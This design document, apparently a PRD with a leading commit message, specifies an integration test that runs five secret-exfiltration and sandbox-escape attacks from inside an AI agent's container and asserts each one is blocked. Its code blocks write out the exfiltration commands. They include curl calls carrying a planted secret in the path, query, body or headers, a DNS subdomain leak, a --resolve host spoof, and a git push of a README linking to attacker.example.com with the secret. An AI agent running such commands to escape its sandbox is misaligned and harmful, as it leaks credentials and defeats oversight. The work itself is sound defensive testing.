Flip Status: Draft -> Active for the 23 PRDs whose work has shipped to main (including 0027, now that PR #95 has merged). Leaves the terminal-status PRDs unchanged: 0007 and 0010 (Superseded) and 0014 (Retargeted) were replaced, not shipped as-is. Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
18 KiB
PRD 0022: End-to-end sandbox-escape integration test
- Status: Active
- Author: didericis
- Created: 2026-05-26
Summary
A new integration test, tests/integration/test_sandbox_escape.py,
that brings up a real bottle with a known allowlist + a known
in-bottle secret, then runs five attacks from inside the agent
container and asserts each one fails. The five categories are
the live cross-section of how the sandbox is supposed to be
load-bearing:
- Request to a non-allowlisted hostname
- Request to a non-allowlisted IP literal
- Secret exfiltration to an allowed dest via HTTP (URL path, query string, request body, request headers)
- Secret exfiltration to an allowed dest via crafted DNS (subdomain-encoded host)
- Secret exfiltration via a link inside a README pushed through git-gate
The suite is the backend-agnostic gate the smolmachines work
has to pass before that backend can be considered a viable
substitute for Docker. Today's Docker backend is the
backend-under-test; the suite runs against whatever
BOT_BOTTLE_BACKEND resolves to.
Problem
The sandbox today is a composition of layers (pipelock,
egress, git-gate, --internal network, supervise) each tested
in isolation but never as a whole. The supervise integration
test exercises the MCP plumbing; test_orphan_cleanup covers
the cleanup CLI; the per-sidecar integration tests bring up
one sidecar at a time. None of them ask the operator-relevant
question: can an in-bottle agent get a secret out?
That's the question every prospective backend has to answer before it can ship. Smolmachines (or any other VM-based backend) will reimplement the sidecar topology over a different runtime. Without a backend-agnostic test we'd be reading the layers' code by eye to confirm each new backend glues them correctly. The diff between "looks right" and "actually blocks exfil" is the whole point of the project.
Goals / Success Criteria
The test suite passes when every one of the five attacks fails with a clear permissions-error signal:
-
Hostname not in allowlist. Agent's
curl https://evil.example.com/returns non-200 (proxy rejection, connection error, or 403). The test asserts the exit code is non-zero AND the response body / stderr does not contain the upstream's actual response. -
IP literal not in allowlist. Agent's
curl https://198.51.100.1/(RFC 5737 documentation range) is blocked. Additionally testscurl --resolve api.anthropic.com:443:198.51.100.1 https://api.anthropic.com/to confirm the host header trick doesn't bypass DNS resolution. -
Secret in HTTP request to an allowed destination. A known SECRET env var is planted in the bottle. The agent tries four shapes against the allowlisted destination:
- Secret in URL path:
GET /v1/<SECRET> - Secret in query string:
GET /v1/?leak=<SECRET> - Secret in request body:
POST /v1/messageswith JSON containing the secret - Secret in request headers:
GET /v1/withX-Custom: <SECRET>The test asserts pipelock's DLP body scanner rejects (3) and surfaces what (1)/(2)/(4) actually do — they may currently pass through (see open questions).
- Secret in URL path:
-
Secret-bearing DNS subdomain to allowed dest's parent. Agent runs
curl https://<SECRET>.api.anthropic.com/. The hostname is constructed to look "under" an allowlisted apex but the SECRET payload leaks via the DNS query to whichever resolver pipelock/egress consults. The test asserts pipelock rejects the host BEFORE issuing the DNS query (host-allowlist matches the exact apex, not subdomains). -
Secret-bearing link in a PR README. Agent edits
README.mdto include[click](https://attacker.example.com/?leak=<SECRET>), commits, andgit pushes through git-gate. The pre-receive hook's gitleaks scan must reject the push because the secret matches one of gitleaks's bundled rules.
The "pass" condition is uniform across all five: the attack's exit code is non-zero AND the secret never reaches a network destination outside the bottle.
Non-goals
- Detecting exfiltration via side channels — timing, cache state, error-message-length oracles. v1 covers the direct paths only.
- Asserting on specific error messages or HTTP status codes. Each layer (pipelock / egress / git-gate / gitleaks) has its own rejection vocabulary. The test asserts on the OUTCOME (attack failed, no upstream traffic) not the WORDING.
- Testing the Docker backend's specific sandbox implementation in detail. That's what the per-sidecar integration tests already do. This suite is composite: did the whole bottle prevent leakage, regardless of which layer caught it?
- A network-tap that confirms zero packets reached attacker.example.com. Out of scope for v1; we trust the pipelock/egress error reporting and verify exit codes. If we want zero-packets confirmation later, a host-side iptables / pcap layer can extend the suite.
- Running against a backend that doesn't exist yet. The
suite is written against the abstract
BottleBackendAPI via the existingget_bottle_backend()selector; future smolmachines work flipsBOT_BOTTLE_BACKEND=smolmachinesand reruns. No smolmachines-specific code here.
Scope
In scope
- A new
tests/integration/test_sandbox_escape.pywith one TestSandboxEscape class and onetest_<n>_<category>method per attack. - A test fixture that:
- Builds a manifest with one bottle, one agent
- The bottle declares: a few allowlisted egress routes (api.anthropic.com, etc.), a git-gate upstream pointing at a throwaway repo, supervise off (not under test)
- Plants three known secret env vars (matching three gitleaks rules — anthropic-api-key, AWS, generic high-entropy) so test 5 parameterizes over shapes.
- A
setUpClasspreflight that verifiescurl,git,digexist in the agent container; raisesunittest.SkipTestlisting missing tools if any are absent (catches future backends with thinner images). - A
_run_in_agent(script)helper that wrapsbottle.exec(script)and returns anExecResult. - Assertions per category that read the existing
ExecResult.returncode/.stdout/.stderr.
Out of scope
- The per-attack remediation engines. If a category's assertion fails, the test is reporting a real gap — the remediation is its own PRD.
- Running the suite as part of every PR's CI. v1 lives in
tests/integration/and runs locally on demand; CI integration is a follow-up that has to weigh wall-clock cost (bringup is ~10s per test class).
Proposed design
Single fixture per attack class
setUpClass brings the bottle up once; tearDownClass
brings it down. Per-test setup is cheap (resetting any
secret-content-storage). The five attacks share the same
bottle so the suite is ~15s wall-clock total instead of
~50s with per-test bringup.
Bottle manifest
# tests/integration/fixtures/sandbox-escape/agents/sandbox-tester.md
---
bottle: dev
---
(no prompt — exec_agent isn't called)
# tests/integration/fixtures/sandbox-escape/bottles/dev.md
---
env:
- name: TEST_SECRET
value: sk-ant-api03-fake-shape-but-realistic-length-for-gitleaks
egress:
routes:
- host: api.anthropic.com
git:
remotes:
127.0.0.1:
Name: throwaway
Upstream: ssh://git@127.0.0.1:22/throwaway.git
IdentityFile: ~/.ssh/cb-test-key # fixture key
---
TEST_SECRET is shaped like an Anthropic API key so
gitleaks's anthropic-api-key rule fires on the README. We
don't ship a real key; the prefix-pattern + length match the
rule's regex.
The git upstream URL is unreachable on purpose — we want git-gate's pre-receive hook to reject the push BEFORE it tries to forward to a real upstream. The hook's gitleaks scan happens first.
Per-attack scaffolding
Each test calls bottle.exec(script) (the existing
Bottle.exec from bot_bottle.backend.Bottle) and
asserts on the returncode + stdout + stderr.
The agent container has curl, git, dig, etc. pre-
installed (already true today for the Docker bottle image).
Attack-1: hostname not in allowlist
def test_1_hostname_not_in_allowlist(self):
result = self.bottle.exec(
'curl --silent --max-time 5 --fail '
'https://evil.example.com/ ; echo "exit=$?"'
)
self.assertNotEqual(0, result.returncode)
# The attack's stdout should not contain anything from
# evil.example.com — pipelock should have stopped it.
self.assertNotIn("evil.example.com", result.stdout)
self.assertIn("exit=", result.stdout)
# extract the curl exit, assert non-zero
...
Attack-2: IP literal not in allowlist
def test_2_ip_not_in_allowlist(self):
# Direct IP
result = self.bottle.exec(
'curl --silent --max-time 5 --fail https://198.51.100.1/'
)
self.assertNotEqual(0, result.returncode)
# Host-header spoof
result = self.bottle.exec(
'curl --silent --max-time 5 --fail '
'--resolve api.anthropic.com:443:198.51.100.1 '
'https://api.anthropic.com/'
)
self.assertNotEqual(0, result.returncode)
Attack-3: HTTP exfil shapes
Loop over four shapes (path / query / body / header), assert each one is blocked by either pipelock's DLP or egress's path-filter. Headers in particular may not be DLP- scanned today — surface that gap clearly if so.
SHAPES = [
("path", 'curl -sf "https://api.anthropic.com/v1/$TEST_SECRET"'),
("query", 'curl -sf "https://api.anthropic.com/v1/?leak=$TEST_SECRET"'),
("body", 'curl -sf -X POST "https://api.anthropic.com/v1/messages" '
'-H "Content-Type: application/json" '
'-d "{\\"secret\\": \\"$TEST_SECRET\\"}"'),
("header", 'curl -sf "https://api.anthropic.com/v1/" '
'-H "X-Custom: $TEST_SECRET"'),
]
def test_3_http_exfil_blocked(self):
for name, cmd in SHAPES:
with self.subTest(shape=name):
result = self.bottle.exec(cmd)
self.assertNotEqual(
0, result.returncode,
f"{name} exfil should have been blocked",
)
Attack-4: DNS exfil — both crafted subdomain AND direct query
Two sub-assertions cover the two ways DNS can leak.
def test_4_dns_exfil_blocked(self):
# 4a — crafted subdomain that pipelock would resolve.
# Pipelock's exact-match allowlist rejects the host
# before issuing the DNS query.
result = self.bottle.exec(
'curl --silent --max-time 5 --fail '
'"https://$TEST_SECRET.api.anthropic.com/"'
)
self.assertNotEqual(0, result.returncode)
# 4b — direct DNS query bypassing pipelock entirely.
# The agent's --internal network has no default
# gateway; even with an explicit resolver like 8.8.8.8
# the query has nowhere to go.
result = self.bottle.exec(
'dig +time=3 +tries=1 @8.8.8.8 '
'"$TEST_SECRET.example.com" || echo "dig exit=$?"'
)
# No successful answer.
self.assertNotIn("ANSWER SECTION", result.stdout)
Attack-5: secret in README push (multi-shape, with ordering check)
Parameterized over three secret shapes so a renamed gitleaks rule doesn't silently let one shape through.
SECRET_SHAPES = [
("anthropic", "$TEST_SECRET_ANTHROPIC"),
("aws", "$TEST_SECRET_AWS"),
("generic", "$TEST_SECRET_GENERIC"),
]
def test_5_readme_push_blocked(self):
for name, env_ref in SECRET_SHAPES:
with self.subTest(secret=name):
result = self.bottle.exec(
'cd /tmp && rm -rf test-repo && '
'git init test-repo && cd test-repo && '
'git config user.email "test@example.com" && '
'git config user.name "test" && '
f'echo "[click](https://attacker.example.com/?leak={env_ref})" > README.md && '
'git add . && git commit -m "leak" && '
'git remote add origin '
'git://bot-bottle-git-gate-<slug>/throwaway.git && '
'git push origin master'
)
self.assertNotEqual(0, result.returncode)
combined = (result.stderr + result.stdout).lower()
# gitleaks ran and rejected.
self.assertIn("gitleaks", combined)
# AND: rejection BEFORE the unreachable upstream
# was contacted — network-phase errors would
# mean gitleaks ran late or not at all.
for upstream_phrase in (
"could not resolve",
"connection refused",
"network is unreachable",
"upstream",
):
self.assertNotIn(
upstream_phrase, combined,
f"unexpected upstream-phase phrase for {name!r}: "
f"gitleaks should reject BEFORE git-gate "
f"attempts an upstream push",
)
The <slug> is templated via the bottle's known identity at
fixture-time. Each subTest independently:
- Confirms the rejection happened (returncode != 0)
- Confirms gitleaks fired (
"gitleaks"in output) - Confirms gitleaks fired BEFORE the upstream attempt (no network-phase phrases in output)
Implementation chunks
Sized small.
-
Fixture + scaffolding. Files under
tests/integration/fixtures/sandbox-escape/, the TestSandboxEscape class withsetUpClass/tearDownClass, the three-secret env-var fixture (anthropic / AWS / generic shapes), and thesetUpClasspreflight that checks forcurl,git,digin the agent and SkipTests with the missing list. No attack tests yet. -
Attack 1 + 2 (hostname + IP). Curl exit-code assertions. Also covers the host-header spoof via
curl --resolve. -
Attack 3 (HTTP exfil shapes). Parameterized over the four shapes (path, query, body, header) via subTest. This chunk is authoritative — if any shape leaks today, the chunk expands to include the remediation PRD work for that shape before merging. May fan out into multiple sub-PRs (one per leaking shape) coordinated as a chunk-3 epic.
-
Attack 4 (DNS exfil). Two sub-assertions: crafted-subdomain-via-pipelock + direct
dig @8.8.8.8from the agent's--internalnetwork. -
Attack 5 (README push via git-gate). Hardest because of the multi-secret-shape parameterization + git-gate-must-be-up requirement + the gitleaks-ordering assertions. The "throwaway" upstream URL is intentionally unreachable.
-
CI integration (best-effort). Add a Gitea Actions job that runs the suite against the Docker backend. Marked
continue-on-error: trueso the workflow doesn't fail if docker-in-docker constraints prevent compose-up. If the runner shape evolves later (privileged Docker socket access) the suite slots in cleanly.
Resolved questions
-
Pipelock DLP coverage for non-body shapes. Resolved: authoritative. Every HTTP-exfil shape (path / query / body / header) MUST block for the suite to pass. If a shape leaks today, it's a real sandbox gap and the remediation lands BEFORE this test merges, not after. The project's purpose is sandbox integrity; shipping a test that documents "we knowingly leak headers" is worse than not shipping the test. May expand the delivery into "this test PRD + N remediation PRDs" depending on what attack 3 surfaces.
-
DNS exfil via the agent's direct DNS resolver. Resolved: add the assertion to test 4. The
--internalnetwork has no default gateway, so a directdig @8.8.8.8 <SECRET>.example.comfrom the agent should fail. Test 4 grows a second sub-assertion alongside the crafted-subdomain-via-pipelock check. -
Realistic fake secret. Resolved: multiple shapes, parameterized. The README attack (test 5) loops over a tuple of secret shapes — anthropic-api-key, AWS key (AKIA...), and a generic high-entropy string — running the push-attempt N times. Each iteration is a subTest. Catches the case where one gitleaks rule lapses but another still fires; also makes the test resilient to rule renames. The fixture bottle's env carries
TEST_SECRET_ANTHROPIC/TEST_SECRET_AWS/TEST_SECRET_GENERICrather than one combinedTEST_SECRET. -
Reachability of throwaway git upstream + gitleaks ordering. Resolved: add ordering assertions to test 5. The pre-receive hook MUST reject the push before git-gate ever attempts to forward to the (unreachable) upstream. Test 5 asserts:
"gitleaks"appears in the rejection output (gitleaks fired)- The rejection output does NOT contain phrases like
"could not resolve","connection refused","network is unreachable", or"upstream"— those would mean gitleaks let the push through and the failure happened later in the chain.
-
CI vs. local-only. Resolved: attempt CI; accept local-only fallback if docker-in-docker blocks it. Add a Gitea Actions job that runs the suite against the Docker backend on a runner with Docker socket access. If compose-up fails because of DiD constraints, the job is marked
continue-on-error: trueand the suite stays local-only until we have a runner shape that can host it. -
Backend-agnostic invocation when backend missing. Resolved: die (current behavior).
get_bottle_backend()already dies with a clear message naming the unknown backend; the test surfaces that as a hard error rather than a skip. Forces the developer to setBOT_BOTTLE_BACKENDto a real implementation — surprise-skips on smolmachines branches that forgot to set the env var are worse than a loud failure. -
Test environment requirements: enforce via preflight. Resolved: preflight check in
setUpClass. After bringing the bottle up, runwhich curl && which git && which diginside the agent container; if any tool is missing, raiseunittest.SkipTestwith the missing list. Catches a future backend that ships a thinner base image without producing five confusing command-not-found failures down the suite.
References
- PRD 0017 — egress-proxy + path-allowlist + auth injection (the layer test 3 + 4 stresses)
- PRD 0014 / 0015 — pipelock / egress remediation flows (the surfaces the attacks would propose changes to if denied via the supervise route)
- PRD 0008 — git-gate + pre-receive gitleaks (the layer test 5 stresses)
- PRD 0018 — compose-per-instance (the topology the test brings up)
tests/integration/test_supervise_sidecar.py— the existing single-sidecar integration test pattern this suite generalizes